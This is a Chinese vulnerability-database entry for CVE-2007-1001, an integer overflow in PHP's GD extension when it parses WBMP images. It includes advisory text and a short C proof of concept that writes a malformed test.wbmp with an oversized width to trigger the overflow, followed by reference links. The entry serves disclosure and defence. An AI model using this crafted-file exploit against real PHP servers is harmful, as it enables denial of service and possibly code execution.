Mac OS X PHP实现攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112650 漏洞类型 数字错误
发布时间 2007-04-07 更新时间 2007-08-01
CVE编号 CVE-2007-1001 CNNVD-ID CNNVD-200704-086
漏洞平台 PHP CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/29823
https://www.securityfocus.com/bid/23357
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200704-086
|漏洞详情
MacOSX是苹果家族计算机所使用的操作系统。AppleMacOSXPHP的实现上存在多个漏洞,可能导致各种攻击。
|漏洞EXP
source: http://www.securityfocus.com/bid/23357/info

PHP's GD extension is prone to two integer-overflow vulnerabilities because it fails to ensure that integer values aren't overrun.

Successfully exploiting these issues allows attackers to crash the affected application, potentially denying service to legitimate users. Due to the nature of the issues, code execution may also be possible, but this has not been confirmed.

PHP 5.2.1 and prior versions are vulnerable. 

#define BUFSIZE 1000000

#include <stdio.h>

int main()
{
      int c;
      char buf[BUFSIZE];

      FILE *fp = fopen("test.wbmp","w");

      //write header
      c = 0;
      fputc(c,fp);
      fputc(c,fp);

      //write width = 2^32 / 4 + 1
      c = 0x84;
      fputc(c,fp);
      c = 0x80;
      fputc(c,fp);
      fputc(c,fp);
      fputc(c,fp);
      c = 0x01;
      fputc(c,fp);

      //write height = 4
      c = 0x04;
      fputc(c,fp);

      //write some data to cause overflow
      fwrite(buf,sizeof(buf),1,fp);

      fclose(fp);
}
|受影响的产品
Turbolinux Turbolinux Server 10.0 x86 Turbolinux Turbolinux Server 10.0 Turbolinux Turbolinux Desktop 10.0 Turbolinux Turbolinux 10 F... TurboLinux Personal TurboLinux Mu
|参考资料

来源:VUPEN
名称:ADV-2007-1269
链接:http://www.frsirt.com/english/advisories/2007/1269
来源:issues.rpath.com
链接:https://issues.rpath.com/browse/RPL-1268
来源:XF
名称:php-gd-overflow(33453)
链接:http://xforce.iss.net/xforce/xfdb/33453
来源:BID
名称:23357
链接:http://www.securityfocus.com/bid/23357
来源:BUGTRAQ
名称:20070418rPSA-2007-0073-1phpphp-mysqlphp-pgsql
链接:http://www.securityfocus.com/archive/1/archive/1/466166/100/0/threaded
来源:BUGTRAQ
名称:20070407PHP<=5.2.1wbmpfilehandlingintegeroverflow
链接:http://www.securityfocus.com/archive/1/archive/1/464957/100/0/threaded
来源:REDHAT
名称:RHSA-2007:0162
链接:http://www.redhat.com/support/errata/RHSA-2007-0162.html
来源:REDHAT
名称:RHSA-2007:0153
链接:http://www.redhat.com/support/errata/RHSA-2007-0153.html
来源:SECUNIA
名称:24965
链接:http://secunia.com/advisories/24965
来源:SECUNIA
名称:24945
链接:http://secunia.com/advisories/24945
来源:SECUNIA
名称:24924
链接:http://secunia.com/advisories/24924
来源:SECUNIA
名称:24814
链接:http://secunia.com/advisories/24814
来源:REDHAT
名称:RHSA-2007:0155
链接:http://